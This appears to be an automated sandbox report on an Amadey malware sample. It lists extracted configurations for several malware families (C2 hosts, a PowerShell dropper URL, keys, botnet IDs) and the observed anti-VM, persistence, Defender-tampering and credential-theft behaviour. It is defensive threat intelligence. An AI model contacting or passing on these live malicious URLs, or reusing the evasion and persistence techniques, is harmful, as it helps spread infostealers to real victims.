amadey | 7b5bd878343c3cecaee575c5046401e677127e53682f1894067af020d3bab1fa

Analysis

max time kernel
90s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
29/03/2025, 15:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Size

938KB
MD5

ed19338ae7b4f14a6300a82555194914
SHA1

c4b17e900215a704197817f8d419b40a07d687e8
SHA256

7b5bd878343c3cecaee575c5046401e677127e53682f1894067af020d3bab1fa
SHA512

64fc35627f5790aa025d05515e8b353ed7825f0cfaf975304933d33b219ccbf7e8e41f9f83152a0a8315568b5195dbbb669d446f6a58f5d3f3a9b9937d16ddca
SSDEEP

24576:9qDEvCTbMWu7rQYlBQcBiT6rprG8a0hu:9TvC/MTQYxsWR7a0h

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes

encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Modded Client Startup
subdirectory
SubDir

Extracted

Family

lumma

https://targett.top/dsANGt

https://oreheatq.live/gsopp

https://castmaxw.run/ganzde

https://weldorae.digital/geds

https://steelixr.live/aguiz

https://advennture.top/GKsiio

https://iftargett.top/dsANGt

https://smeltingt.run/giiaus

https://ferromny.digital/gwpd

https://skynetxc.live/AksoPA

https://byteplusx.digital/aXweAX

https://travewlio.shop/ZNxbHi

https://apixtreev.run/LkaUz

https://tsparkiob.digital/KeASUp

https://appgridn.live/LEjdAK

https://esccapewz.run/ANSbwqy

https://touvrlane.bet/ASKwjq

https://sighbtseeing.shop/ASJnzh

https://holidamyup.today/AOzkns

https://mtriplooqp.world/APowko

Extracted

Family

vidar

Version

13.3

Botnet

928af183c2a2807a3c0526e8c0c9369d

https://t.me/lw25chm

https://steamcommunity.com/profiles/76561199839170361

Attributes

user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Vidar Stealer 22 IoCs

stealer

resource	yara_rule
behavioral2/memory/4612-366-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4612-367-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4612-374-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4612-375-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4612-380-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4612-402-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4612-405-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4612-422-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4612-423-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4612-424-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4612-428-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4612-432-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4612-872-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4612-884-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4612-883-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4612-886-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4612-889-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4612-905-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4612-918-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4612-937-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4612-941-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4612-948-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral2/memory/4648-152-0x000000000CD50000-0x000000000CEA4000-memory.dmp	family_quasar
behavioral2/memory/4648-156-0x0000000005520000-0x000000000553A000-memory.dmp	family_quasar

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral2/memory/18084-42240-0x0000000000400000-0x00000000004CC000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempU55FUKMISSSRBDYIGR5YVIYEYRZ1JSTN.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	194b034ebb.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2609233090.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6a8d5b79b0.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	eb2df5e704.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6dbecdb1f3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	7866b52300.exe

Blocklisted process makes network request 6 IoCs

flow	pid	Process
18	976	powershell.exe
40	4648	powershell.exe
41	3336	powershell.exe
42	4648	powershell.exe
46	4648	powershell.exe
60	1684	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 40 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4860	powershell.exe
5180	powershell.exe
784	powershell.exe
2600	powershell.exe
2500	powershell.exe
4564	powershell.exe
784	powershell.exe
696	powershell.exe
5980	powershell.exe
1220	powershell.exe
5212	powershell.exe
5624	powershell.exe
1648	powershell.exe
5288	powershell.exe
4092	powershell.exe
7164	powershell.exe
4620	powershell.exe
4736	powershell.exe
5624	powershell.exe
7352	powershell.exe
1988	powershell.exe
5680	PowerShell.exe
3928	powershell.exe
3468	powershell.exe
3008	powershell.exe
5416	powershell.exe
1220	powershell.exe
5212	powershell.exe
5624	powershell.exe
4736	powershell.exe
5980	powershell.exe
1648	powershell.exe
5288	powershell.exe
5624	powershell.exe
4092	powershell.exe
7796	powershell.exe
976	powershell.exe
4648	powershell.exe
3336	powershell.exe
1684	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 16 IoCs

flow	pid	Process
91	888	futors.exe
91	888	futors.exe
111	888	futors.exe
144	888	futors.exe
80	6112	rapes.exe
80	6112	rapes.exe
18	976	powershell.exe
41	3336	powershell.exe
60	1684	powershell.exe
178	888	futors.exe
32	6112	rapes.exe
32	6112	rapes.exe
252	6112	rapes.exe
252	6112	rapes.exe
252	6112	rapes.exe
252	6112	rapes.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
2960	takeown.exe
516	icacls.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 15 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
3308	chrome.exe
6676	chrome.exe
8064	msedge.exe
1996	chrome.exe
3852	msedge.exe
2324	msedge.exe
3988	chrome.exe
8008	msedge.exe
212	chrome.exe
1208	msedge.exe
1212	chrome.exe
4184	chrome.exe
4320	chrome.exe
5004	chrome.exe
12072	chrome.exe

Checks BIOS information in registry 2 TTPs 22 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempU55FUKMISSSRBDYIGR5YVIYEYRZ1JSTN.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6dbecdb1f3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempU55FUKMISSSRBDYIGR5YVIYEYRZ1JSTN.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	194b034ebb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6dbecdb1f3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7866b52300.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	eb2df5e704.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	eb2df5e704.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7866b52300.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	194b034ebb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2609233090.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2609233090.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6a8d5b79b0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6a8d5b79b0.exe

Checks computer location settings 2 TTPs 11 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	Bell_Setup16.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	22.exe
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	22.exe
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	amnew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	futors.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_3798924e.cmd	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_3798924e.cmd	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
2424	TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE
6112	rapes.exe
4192	apple.exe
5976	22.exe
1884	22.exe
1680	e214b0379a.exe
1224	TempU55FUKMISSSRBDYIGR5YVIYEYRZ1JSTN.EXE
2296	6lV7WRt.exe
4112	483d2fa8a0d53818306efeb32d3.exe
1040	amnew.exe
888	futors.exe
1228	rapes.exe
5888	futors.exe
3280	7866b52300.exe
4784	gron12321.exe
4564	v7942.exe
3632	alex1dskfmdsf.exe
3596	194b034ebb.exe
2320	svchost015.exe
4756	Bell_Setup16.exe
2336	Bell_Setup16.tmp
1076	Bell_Setup16.exe
468	Bell_Setup16.tmp
3632	2609233090.exe
876	6lV7WRt.exe
4964	svchost015.exe
2296	bot.exe
2348	javaruntimew.exe
1484	javaplugin_update.exe
5276	javaruntime_platform.exe
5216	javaupdater_update.exe
5596	javapluginw.exe
3504	Rm3cVPI.exe
2432	javasupport_update.exe
2688	javasupportw.exe
2140	javaservice_service.exe
932	javaplugin_service.exe
5256	javasupport.exe
1148	javaservice_service.exe
548	javaplugin_service.exe
1116	javaruntimew.exe
3620	javaupdater_update.exe
5800	javaplatform_service.exe
5964	jokererer.exe
3208	javaplatform_platform.exe
3480	javaruntime_platform.exe
1088	javasupport_update.exe
404	javasupport_platform.exe
3684	javaplatform_update.exe
5684	javaupdater_service.exe
4424	javasupport_platform.exe
2996	javaplugin_update.exe
1680	javaplatform_update.exe
4260	javaservice_service.exe
5316	javasupportw.exe
3644	javaupdater.exe
5616	javaservicew.exe
3620	javaplatform_update.exe
5520	javaplatform_platform.exe
4732	javaplatform_update.exe
3228	javaservicew.exe
2032	javaruntimew.exe
1088	javaplatform.exe
5900	javaruntime.exe

Identifies Wine through registry keys 2 TTPs 11 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	TempU55FUKMISSSRBDYIGR5YVIYEYRZ1JSTN.EXE
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	7866b52300.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	194b034ebb.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	2609233090.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	6a8d5b79b0.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	eb2df5e704.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	6dbecdb1f3.exe

Loads dropped DLL 1 IoCs

pid	Process
4900	regsvr32.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
516	icacls.exe
2960	takeown.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaservice_platform.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaservice_platform.exe\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javasupport_platform.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javasupport_platform.exe\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaservice_service.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaservice_service.exe\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\eb2df5e704.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10044090101\\eb2df5e704.exe"	futors.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaplugin_update.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaplugin_update.exe\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e214b0379a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10369870101\\e214b0379a.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10369880121\\am_no.cmd"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	6a8d5b79b0.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x00090000000242b5-141.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs

pid	Process
2424	TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE
6112	rapes.exe
1224	TempU55FUKMISSSRBDYIGR5YVIYEYRZ1JSTN.EXE
4112	483d2fa8a0d53818306efeb32d3.exe
1228	rapes.exe
3280	7866b52300.exe
3596	194b034ebb.exe
3632	2609233090.exe
1988	6a8d5b79b0.exe
5316	eb2df5e704.exe
4464	6dbecdb1f3.exe

Suspicious use of SetThreadContext 9 IoCs

description	pid	Process	procid_target
PID 2296 set thread context of 4676	2296	6lV7WRt.exe	206
PID 4784 set thread context of 4712	4784	gron12321.exe	221
PID 4564 set thread context of 4612	4564	v7942.exe	223
PID 3632 set thread context of 2980	3632	alex1dskfmdsf.exe	226
PID 3596 set thread context of 2320	3596	194b034ebb.exe	238
PID 876 set thread context of 3108	876	6lV7WRt.exe	260
PID 3632 set thread context of 4964	3632	2609233090.exe	261
PID 5964 set thread context of 5960	5964	jokererer.exe	292
PID 5316 set thread context of 4508	5316	eb2df5e704.exe	374

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE
File created	C:\Windows\Tasks\futors.job	amnew.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5384	sc.exe
5376	sc.exe
5596	sc.exe
3908	sc.exe
2328	sc.exe
3936	sc.exe
3896	sc.exe
3684	sc.exe
2648	sc.exe
3820	sc.exe
5920	sc.exe
2088	sc.exe
1556	sc.exe
4436	sc.exe
3472	sc.exe
3892	sc.exe
1840	sc.exe
6120	sc.exe
